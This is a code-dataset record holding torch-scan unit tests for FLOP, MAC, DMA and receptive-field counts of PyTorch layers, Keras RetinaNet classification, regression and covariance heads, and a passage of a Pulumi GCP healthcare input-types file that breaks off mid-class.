null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c797eb10101d990b77e7bb5e6c57289ea5dcbdff
11,929
py
Python
test/test_modules.py
frgfm/torch-scan
61116d92e35a8c65e7d9f46c6f88939d04c11cfe
[ "Apache-2.0" ]
91
2020-03-17T00:25:45.000Z
2022-03-12T13:42:53.000Z
test/test_modules.py
frgfm/torch-scan
61116d92e35a8c65e7d9f46c6f88939d04c11cfe
[ "Apache-2.0" ]
37
2020-03-17T01:39:19.000Z
2021-07-13T09:17:14.000Z
test/test_modules.py
frgfm/torch-scan
61116d92e35a8c65e7d9f46c6f88939d04c11cfe
[ "Apache-2.0" ]
9
2020-04-24T10:42:33.000Z
2021-12-29T11:49:42.000Z
# Copyright (C) 2020-2021, François-Guillaume Fernandez. # This program is licensed under the Apache License version 2. # See LICENSE or go to <https://www.apache.org/licenses/LICENSE-2.0.txt> for full license details. import unittest import torch from torch import nn from torchscan import modules class MyModule(nn.Module): def __init__(self): super().__init__() class Tester(unittest.TestCase): @torch.no_grad() def test_module_flops(self): # Check for unknown module that it returns 0 and throws a warning self.assertEqual(modules.module_flops(MyModule(), None, None), 0) self.assertWarns(UserWarning, modules.module_flops, MyModule(), None, None) # Common unit tests self.assertEqual(modules.module_flops(nn.Linear(8, 4), (torch.zeros((1, 8)),), torch.zeros((1, 4))), 4 * (2 * 8 - 1) + 4) self.assertEqual(modules.module_flops(nn.Linear(8, 4, bias=False), (torch.zeros((1, 8)),), torch.zeros((1, 4))), 4 * (2 * 8 - 1)) # Activations self.assertEqual(modules.module_flops(nn.Identity(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 0) self.assertEqual(modules.module_flops(nn.Flatten(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 0) self.assertEqual(modules.module_flops(nn.ReLU(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 8) self.assertEqual(modules.module_flops(nn.ELU(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 48) self.assertEqual(modules.module_flops(nn.LeakyReLU(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 32) self.assertEqual(modules.module_flops(nn.ReLU6(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 16) self.assertEqual(modules.module_flops(nn.Tanh(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 48) self.assertEqual(modules.module_flops(nn.Sigmoid(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 32) # BN self.assertEqual(modules.module_flops(nn.BatchNorm1d(8), (torch.zeros((1, 8, 4)),), torch.zeros((1, 8, 4))), 144 + 32 + 32 * 3 + 48) # Pooling self.assertEqual(modules.module_flops(nn.MaxPool2d((2, 2)), (torch.zeros((1, 8, 4, 4)),), torch.zeros((1, 8, 2, 2))), 3 * 32) self.assertEqual(modules.module_flops(nn.AvgPool2d((2, 2)), (torch.zeros((1, 8, 4, 4)),), torch.zeros((1, 8, 2, 2))), 5 * 32) self.assertEqual(modules.module_flops(nn.AdaptiveMaxPool2d((2, 2)), (torch.zeros((1, 8, 4, 4)),), torch.zeros((1, 8, 2, 2))), 3 * 32) # Check that single integer output size is supported self.assertEqual(modules.module_flops(nn.AdaptiveMaxPool2d(2), (torch.zeros((1, 8, 4, 4)),), torch.zeros((1, 8, 2, 2))), 3 * 32) self.assertEqual(modules.module_flops(nn.AdaptiveAvgPool2d((2, 2)), (torch.zeros((1, 8, 4, 4)),), torch.zeros((1, 8, 2, 2))), 5 * 32) # Check that single integer output size is supported self.assertEqual(modules.module_flops(nn.AdaptiveAvgPool2d(2), (torch.zeros((1, 8, 4, 4)),), torch.zeros((1, 8, 2, 2))), 5 * 32) # Dropout self.assertEqual(modules.module_flops(nn.Dropout(), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 8) self.assertEqual(modules.module_flops(nn.Dropout(p=0), (torch.zeros((1, 8)),), torch.zeros((1, 8))), 0) # Conv input_t = torch.rand((1, 3, 32, 32)) mod = nn.Conv2d(3, 8, 3) self.assertEqual(modules.module_flops(mod, (input_t,), mod(input_t)), 388800) # ConvTranspose mod = nn.ConvTranspose2d(3, 8, 3) self.assertEqual(modules.module_flops(mod, (input_t,), mod(input_t)), 499408) # Transformer mod = nn.Transformer(nhead=4, num_encoder_layers=3) src = torch.rand((10, 32, 512)) tgt = torch.rand((20, 32, 512)) self.assertEqual(modules.module_flops(mod, (src, tgt), mod(src, tgt)), 1916295945) @torch.no_grad() def test_module_macs(self): # Check for unknown module that it returns 0 and throws a warning self.assertEqual(modules.module_macs(MyModule(), None, None), 0) self.assertWarns(UserWarning, modules.module_macs, MyModule(), None, None) # Linear self.assertEqual(modules.module_macs(nn.Linear(8, 4), torch.zeros((1, 8)), torch.zeros((1, 4))), 8 * 4) # Activations self.assertEqual(modules.module_macs(nn.ReLU(), None, None), 0) # Conv input_t = torch.rand((1, 3, 32, 32)) mod = nn.Conv2d(3, 8, 3) self.assertEqual(modules.module_macs(mod, input_t, mod(input_t)), 194400) # ConvTranspose mod = nn.ConvTranspose2d(3, 8, 3) self.assertEqual(modules.module_macs(mod, input_t, mod(input_t)), 249704) # BN self.assertEqual(modules.module_macs(nn.BatchNorm1d(8), torch.zeros((1, 8, 4)), torch.zeros((1, 8, 4))), 64 + 24 + 56 + 32) # Pooling self.assertEqual(modules.module_macs(nn.MaxPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 3 * 32) self.assertEqual(modules.module_macs(nn.AvgPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 5 * 32) self.assertEqual(modules.module_macs(nn.AdaptiveMaxPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 3 * 32) self.assertEqual(modules.module_macs(nn.AdaptiveAvgPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 5 * 32) # Test support integer output-size support self.assertEqual(modules.module_macs(nn.AdaptiveMaxPool2d(2), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 3 * 32) self.assertEqual(modules.module_macs(nn.AdaptiveAvgPool2d(2), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 5 * 32) # Dropout self.assertEqual(modules.module_macs(nn.Dropout(), torch.zeros((1, 8)), torch.zeros((1, 8))), 0) @torch.no_grad() def test_module_dmas(self): # Check for unknown module that it returns 0 and throws a warning self.assertEqual(modules.module_dmas(MyModule(), None, None), 0) self.assertWarns(UserWarning, modules.module_dmas, MyModule(), None, None) # Common unit tests # Linear self.assertEqual(modules.module_dmas(nn.Linear(8, 4), torch.zeros((1, 8)), torch.zeros((1, 4))), 4 * (8 + 1) + 8 + 4) # Activation self.assertEqual(modules.module_dmas(nn.Identity(), torch.zeros((1, 8)), torch.zeros((1, 8))), 8) self.assertEqual(modules.module_dmas(nn.Flatten(), torch.zeros((1, 8)), torch.zeros((1, 8))), 16) self.assertEqual(modules.module_dmas(nn.ReLU(), torch.zeros((1, 8)), torch.zeros((1, 8))), 8 * 2) self.assertEqual(modules.module_dmas(nn.ReLU(inplace=True), torch.zeros((1, 8)), None), 8) self.assertEqual(modules.module_dmas(nn.ELU(), torch.zeros((1, 8)), torch.zeros((1, 8))), 17) self.assertEqual(modules.module_dmas(nn.Sigmoid(), torch.zeros((1, 8)), torch.zeros((1, 8))), 16) self.assertEqual(modules.module_dmas(nn.Tanh(), torch.zeros((1, 8)), torch.zeros((1, 8))), 24) # Conv input_t = torch.rand((1, 3, 32, 32)) mod = nn.Conv2d(3, 8, 3) self.assertEqual(modules.module_dmas(mod, input_t, mod(input_t)), 201824) # ConvTranspose mod = nn.ConvTranspose2d(3, 8, 3) self.assertEqual(modules.module_dmas(mod, input_t, mod(input_t)), 259178) # BN self.assertEqual(modules.module_dmas(nn.BatchNorm1d(8), torch.zeros((1, 8, 4)), torch.zeros((1, 8, 4))), 32 + 17 + 1 + 16 + 17 + 32) # Pooling self.assertEqual(modules.module_dmas(nn.MaxPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 4 * 32 + 32) self.assertEqual(modules.module_dmas(nn.AdaptiveMaxPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 4 * 32 + 32) # Integer output size support self.assertEqual(modules.module_dmas(nn.MaxPool2d(2), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 4 * 32 + 32) self.assertEqual(modules.module_dmas(nn.AdaptiveMaxPool2d(2), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), 4 * 32 + 32) # Dropout self.assertEqual(modules.module_dmas(nn.Dropout(), torch.zeros((1, 8)), torch.zeros((1, 8))), 17) @torch.no_grad() def test_module_rf(self): # Check for unknown module that it returns 0 and throws a warning self.assertEqual(modules.module_rf(MyModule(), None, None), (1, 1, 0)) self.assertWarns(UserWarning, modules.module_rf, MyModule(), None, None) # Common unit tests # Linear self.assertEqual(modules.module_rf(nn.Linear(8, 4), torch.zeros((1, 8)), torch.zeros((1, 4))), (1, 1, 0)) # Activation self.assertEqual(modules.module_rf(nn.Identity(), torch.zeros((1, 8)), torch.zeros((1, 8))), (1, 1, 0)) self.assertEqual(modules.module_rf(nn.Flatten(), torch.zeros((1, 8)), torch.zeros((1, 8))), (1, 1, 0)) self.assertEqual(modules.module_rf(nn.ReLU(), torch.zeros((1, 8)), torch.zeros((1, 8))), (1, 1, 0)) self.assertEqual(modules.module_rf(nn.ELU(), torch.zeros((1, 8)), torch.zeros((1, 8))), (1, 1, 0)) self.assertEqual(modules.module_rf(nn.Sigmoid(), torch.zeros((1, 8)), torch.zeros((1, 8))), (1, 1, 0)) self.assertEqual(modules.module_rf(nn.Tanh(), torch.zeros((1, 8)), torch.zeros((1, 8))), (1, 1, 0)) # Conv input_t = torch.rand((1, 3, 32, 32)) mod = nn.Conv2d(3, 8, 3) self.assertEqual(modules.module_rf(mod, input_t, mod(input_t)), (3, 1, 0)) # Check for dilation support mod = nn.Conv2d(3, 8, 3, dilation=2) self.assertEqual(modules.module_rf(mod, input_t, mod(input_t)), (5, 1, 0)) # ConvTranspose mod = nn.ConvTranspose2d(3, 8, 3) self.assertEqual(modules.module_rf(mod, input_t, mod(input_t)), (-3, 1, 0)) # BN self.assertEqual(modules.module_rf(nn.BatchNorm1d(8), torch.zeros((1, 8, 4)), torch.zeros((1, 8, 4))), (1, 1, 0)) # Pooling self.assertEqual(modules.module_rf(nn.MaxPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), (2, 2, 0)) self.assertEqual(modules.module_rf(nn.AdaptiveMaxPool2d((2, 2)), torch.zeros((1, 8, 4, 4)), torch.zeros((1, 8, 2, 2))), (2, 2, 0)) # Dropout self.assertEqual(modules.module_rf(nn.Dropout(), torch.zeros((1, 8)), torch.zeros((1, 8))), (1, 1, 0)) if __name__ == '__main__': unittest.main()
52.783186
120
0.537597
1,573
11,929
3.998093
0.090273
0.166958
0.183654
0.190809
0.898076
0.885514
0.758944
0.734775
0.708698
0.660836
0
0.080285
0.294157
11,929
225
121
53.017778
0.666627
0.079722
0
0.357616
0
0
0.000732
0
0
0
0
0
0.476821
1
0.033113
false
0
0.02649
0
0.072848
0
0
0
0
null
0
1
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
9
c7d8a82bfa50897bc43eef3bf3104e26168b13b1
10,062
py
Python
src/retina_net/models/multitask_headers.py
asharakeh/bayes-od-rc
3f478e5c9a593ee03d7b63d533d46d87d739fc26
[ "MIT" ]
30
2019-09-17T22:37:34.000Z
2022-01-17T14:34:42.000Z
src/retina_net/models/multitask_headers.py
asharakeh/bayes-od-rc
3f478e5c9a593ee03d7b63d533d46d87d739fc26
[ "MIT" ]
4
2019-10-07T23:05:46.000Z
2020-11-26T16:24:28.000Z
src/retina_net/models/multitask_headers.py
asharakeh/bayes-od-rc
3f478e5c9a593ee03d7b63d533d46d87d739fc26
[ "MIT" ]
5
2019-09-17T22:37:36.000Z
2022-02-16T13:33:24.000Z
import numpy as np import tensorflow as tf keras = tf.keras class ClsHeader(keras.Model): def __init__(self, header_config): super(ClsHeader, self).__init__() self.anchors_per_location = header_config['anchors_per_location'] self.num_classes = header_config['num_classes'] dropout_rate = header_config['dropout_rate'] l2_norm_rate = header_config['l2_norm_rate'] # Classification Header (Naming convention compatible with fizyr # keras-retinanet) self.conv_1 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_classification_0', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_1 = keras.layers.Dropout( name='drop1', rate=dropout_rate) self.conv_2 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_classification_1', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_2 = keras.layers.Dropout( name='drop2', rate=dropout_rate) self.conv_3 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_classification_2', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_3 = keras.layers.Dropout( name='drop3', rate=dropout_rate) self.conv_4 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_classification_3', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_4 = keras.layers.Dropout( name='drop4', rate=dropout_rate) cls_bias_initializer = np.zeros(self.num_classes + 1) cls_bias_initializer[:-1] = -np.log((1.0 - 0.01) / 0.01) cls_bias_initializer = np.tile( cls_bias_initializer, self.anchors_per_location) self.cls_out = keras.layers.Conv2D( self.anchors_per_location * ( self.num_classes + 1), (1, 1), strides=(1, 1), padding='same', kernel_initializer='he_normal', bias_initializer=keras.initializers.constant(cls_bias_initializer), name='pyramid_classification') self.relu = keras.layers.ReLU() def call(self, input_tensor, mc_dropout_enabled): num_input_pixels = tf.shape(input_tensor)[ 1] * tf.shape(input_tensor)[2] x = self.conv_1(input_tensor) x = self.relu(x) x = self.drop_1(x, training=mc_dropout_enabled) x = self.conv_2(x) x = self.relu(x) x = self.drop_2(x, training=mc_dropout_enabled) x = self.conv_3(x) x = self.relu(x) x = self.drop_3(x, training=mc_dropout_enabled) x = self.conv_4(x) x = self.relu(x) x = self.drop_4(x, training=mc_dropout_enabled) cls_out = self.cls_out(x) cls_out = tf.reshape( cls_out, [-1, self.anchors_per_location * num_input_pixels, self.num_classes + 1]) return cls_out class RegHeader(keras.Model): def __init__(self, header_config): super(RegHeader, self).__init__() self.anchors_per_location = header_config['anchors_per_location'] dropout_rate = header_config['dropout_rate'] l2_norm_rate = header_config['l2_norm_rate'] # Regression Header self.conv_1 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_regression_0', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_1 = keras.layers.Dropout( name='drop1', rate=dropout_rate) self.conv_2 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_regression_1', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_2 = keras.layers.Dropout( name='drop2', rate=dropout_rate) self.conv_3 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_regression_2', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_3 = keras.layers.Dropout( name='drop3', rate=dropout_rate) self.conv_4 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_regression_3', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_4 = keras.layers.Dropout( name='drop4', rate=dropout_rate) self.reg_out = keras.layers.Conv2D( self.anchors_per_location * 4, (1, 1), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_regression') self.relu = keras.layers.ReLU() def call(self, input_tensor, mc_dropout_enabled): num_input_pixels = tf.shape(input_tensor)[ 1] * tf.shape(input_tensor)[2] x = self.conv_1(input_tensor) x = self.relu(x) x = self.drop_1(x, training=mc_dropout_enabled) x = self.conv_2(x) x = self.relu(x) x = self.drop_2(x, training=mc_dropout_enabled) x = self.conv_3(x) x = self.relu(x) x = self.drop_3(x, training=mc_dropout_enabled) reg_out = self.reg_out(x) reg_out = tf.reshape( reg_out, [-1, self.anchors_per_location * num_input_pixels, 4]) return reg_out class CovHeader(keras.Model): def __init__(self, header_config): super(CovHeader, self).__init__() self.anchors_per_location = header_config['anchors_per_location'] dropout_rate = header_config['dropout_rate'] l2_norm_rate = header_config['l2_norm_rate'] # Covariance Header self.conv_1 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_cov_0', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_1 = keras.layers.Dropout( name='drop1', rate=dropout_rate) self.conv_2 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_cov_1', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_2 = keras.layers.Dropout( name='drop2', rate=dropout_rate) self.conv_3 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_cov_2', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_3 = keras.layers.Dropout( name='drop3', rate=dropout_rate) self.conv_4 = keras.layers.Conv2D( 256, (3, 3), strides=( 1, 1), padding='same', kernel_initializer='he_normal', name='pyramid_cov_3', kernel_regularizer=keras.regularizers.l2(l2_norm_rate)) self.drop_4 = keras.layers.Dropout( name='drop4', rate=dropout_rate) # Number of elements required to describe an NxN covariance matrix is # computed as: (N * (N + 1)) / 2 cov_init = keras.initializers.TruncatedNormal(mean=0.0, stddev=1e-6) self.cov_out = keras.layers.Conv2D( self.anchors_per_location * 10, (1, 1), strides=( 1, 1), padding='same', kernel_initializer=cov_init, kernel_regularizer=keras.regularizers.l2(l2_norm_rate), name='pyramid_cov') self.relu = keras.layers.ReLU() def call(self, input_tensor, mc_dropout_enabled): num_input_pixels = tf.shape(input_tensor)[ 1] * tf.shape(input_tensor)[2] x = self.conv_1(input_tensor) x = self.relu(x) x = self.drop_1(x, training=mc_dropout_enabled) x = self.conv_2(x) x = self.relu(x) x = self.drop_2(x, training=mc_dropout_enabled) x = self.conv_3(x) x = self.relu(x) x = self.drop_3(x, training=mc_dropout_enabled) x = self.conv_4(x) x = self.relu(x) x = self.drop_4(x, training=mc_dropout_enabled) cov_out = self.cov_out(x) cov_out = tf.reshape( cov_out, [-1, self.anchors_per_location * num_input_pixels, 10]) return cov_out
29.335277
85
0.535579
1,140
10,062
4.444737
0.089474
0.032564
0.037498
0.047365
0.851983
0.846852
0.841326
0.841326
0.784883
0.753503
0
0.038175
0.359571
10,062
342
86
29.421053
0.748138
0.021368
0
0.79562
0
0
0.067886
0.011992
0
0
0
0
0
1
0.021898
false
0
0.007299
0
0.051095
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
400269ea0378e92fb0efe3079d3b46b1deaa1a8b
36,785
py
Python
sdk/python/pulumi_gcp/healthcare/_inputs.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
121
2018-06-18T19:16:42.000Z
2022-03-31T06:06:48.000Z
sdk/python/pulumi_gcp/healthcare/_inputs.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
492
2018-06-22T19:41:03.000Z
2022-03-31T15:33:53.000Z
sdk/python/pulumi_gcp/healthcare/_inputs.py
sisisin/pulumi-gcp
af6681d70ea457843409110c1324817fe55f68ad
[ "ECL-2.0", "Apache-2.0" ]
43
2018-06-19T01:43:13.000Z
2022-03-23T22:43:37.000Z
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'ConsentStoreIamBindingConditionArgs', 'ConsentStoreIamMemberConditionArgs', 'DatasetIamBindingConditionArgs', 'DatasetIamMemberConditionArgs', 'DicomStoreIamBindingConditionArgs', 'DicomStoreIamMemberConditionArgs', 'DicomStoreNotificationConfigArgs', 'DicomStoreStreamConfigArgs', 'DicomStoreStreamConfigBigqueryDestinationArgs', 'FhirStoreIamBindingConditionArgs', 'FhirStoreIamMemberConditionArgs', 'FhirStoreNotificationConfigArgs', 'FhirStoreStreamConfigArgs', 'FhirStoreStreamConfigBigqueryDestinationArgs', 'FhirStoreStreamConfigBigqueryDestinationSchemaConfigArgs', 'Hl7StoreIamBindingConditionArgs', 'Hl7StoreIamMemberConditionArgs', 'Hl7StoreNotificationConfigArgs', 'Hl7StoreNotificationConfigsArgs', 'Hl7StoreParserConfigArgs', ] @pulumi.input_type class ConsentStoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class ConsentStoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DatasetIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DatasetIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DicomStoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DicomStoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class DicomStoreNotificationConfigArgs: def __init__(__self__, *, pubsub_topic: pulumi.Input[str]): """ :param pulumi.Input[str] pubsub_topic: The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ pulumi.set(__self__, "pubsub_topic", pubsub_topic) @property @pulumi.getter(name="pubsubTopic") def pubsub_topic(self) -> pulumi.Input[str]: """ The Cloud Pub/Sub topic that notifications of changes are published on. Supplied by the client. PubsubMessage.Data will contain the resource name. PubsubMessage.MessageId is the ID of this message. It is guaranteed to be unique within the topic. PubsubMessage.PublishTime is the time at which the message was published. Notifications are only sent if the topic is non-empty. Topic names must be scoped to a project. service-PROJECT_NUMBER@gcp-sa-healthcare.iam.gserviceaccount.com must have publisher permissions on the given Cloud Pub/Sub topic. Not having adequate permissions will cause the calls that send notifications to fail. """ return pulumi.get(self, "pubsub_topic") @pubsub_topic.setter def pubsub_topic(self, value: pulumi.Input[str]): pulumi.set(self, "pubsub_topic", value) @pulumi.input_type class DicomStoreStreamConfigArgs: def __init__(__self__, *, bigquery_destination: pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs']): """ :param pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs'] bigquery_destination: BigQueryDestination to include a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. Structure is documented below. """ pulumi.set(__self__, "bigquery_destination", bigquery_destination) @property @pulumi.getter(name="bigqueryDestination") def bigquery_destination(self) -> pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs']: """ BigQueryDestination to include a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. Structure is documented below. """ return pulumi.get(self, "bigquery_destination") @bigquery_destination.setter def bigquery_destination(self, value: pulumi.Input['DicomStoreStreamConfigBigqueryDestinationArgs']): pulumi.set(self, "bigquery_destination", value) @pulumi.input_type class DicomStoreStreamConfigBigqueryDestinationArgs: def __init__(__self__, *, table_uri: pulumi.Input[str]): """ :param pulumi.Input[str] table_uri: a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. """ pulumi.set(__self__, "table_uri", table_uri) @property @pulumi.getter(name="tableUri") def table_uri(self) -> pulumi.Input[str]: """ a fully qualified BigQuery table URI where DICOM instance metadata will be streamed. """ return pulumi.get(self, "table_uri") @table_uri.setter def table_uri(self, value: pulumi.Input[str]): pulumi.set(self, "table_uri", value) @pulumi.input_type class FhirStoreIamBindingConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, "expression", expression) pulumi.set(__self__, "title", title) if description is not None: pulumi.set(__self__, "description", description) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, "expression") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, "expression", value) @property @pulumi.getter def title(self) -> pulumi.Input[str]: return pulumi.get(self, "title") @title.setter def title(self, value: pulumi.Input[str]): pulumi.set(self, "title", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @pulumi.input_type class FhirStoreIamMemberConditionArgs: def __init__(__self__, *, expression: pulumi.Input[str], title: pulumi.Input[str], description: 